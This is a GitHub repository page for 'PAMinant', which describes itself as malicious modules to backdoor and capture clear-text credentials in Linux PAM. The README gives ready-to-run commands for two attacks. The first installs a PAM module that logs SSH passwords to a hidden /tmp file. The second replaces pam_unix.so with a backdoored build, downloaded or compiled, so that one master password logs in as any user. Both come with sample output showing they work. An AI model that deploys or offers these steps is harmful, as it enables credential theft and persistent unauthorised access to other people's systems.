Skip to content

innxrmxst/PAMinant

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
linux-pam-backdoor
linux-pam-backdoor
 
 
README.md
README.md
 
 
pam_logger.c
pam_logger.c
 
 
pam_logger.so
pam_logger.so
 
 

Repository files navigation

Tested on:

  • Linux WORK-ubuntu-dev 6.11.0-21-generic #21~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Feb 24 16:52:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
  • PAM 1.5.3

0] Clone repo

git clone https://github.com/innxrmxst/PAMinant.git
cd PAMinant

1] Installing PAM clear text password logger

Useful for collection and possible password reuse checks against other assets if cracking /etc/shadow is not an option :)

sudo apt install gcc -y
sudo apt-get install libpam0g-dev -y
gcc -fPIC -c pam_logger.c
gcc -shared -o pam_logger.so pam_logger.o -lpam
sudo mv pam_logger.so /lib/x86_64-linux-gnu/security/
sudo nano /etc/pam.d/sshd
auth       optional     pam_logger.so

sudo systemctl restart ssh

-> ssh localuser@10.6.11.99
password

localuser@WORK-ubuntu-dev:~$ sudo cat /tmp/.service_temp_data
[2025-04-09 18:09:34] User: 'localuser' Password: 'password'

2] Installing PAM backdoor

For PAM 1.5.3 in use, module can be installed:

#wget https://raw.githubusercontent.com/innxrmxst/PAMinant/refs/heads/main/linux-pam-backdoor/backdoored153.so -O /lib/x86_64-linux-gnu/security/pam_unix.so
mv linux-pam-backdoor/backdoored153.so /lib/x86_64-linux-gnu/security/pam_unix.so

Or build and install it from scratch:

sudo apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc docbook-xsl docbook-xml xsltproc xmlto git -y

git clone https://github.com/segmentati0nf4ult/linux-pam-backdoor.git

cd linux-pam-backdoor

sudo su

./backdoor.sh -v $(dpkg -l | grep libpam-mod | awk -F " " '{print $3}' | awk -F "-" '{print $1}' | sort -u) -p backdoor

Now using ssh localuser@10.6.15.4 with the password backdoor will grant you access for any user. (If doesn't work for root user, make sure PermitRootLogin is set to yes in /etc/ssh/sshd_config

-> ssh localuser@10.6.11.99
backdoor

localuser@WORK-ubuntu-dev:~$

Credits

About

Malicious modules to backdoor and capture clear text credentials in PAM.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages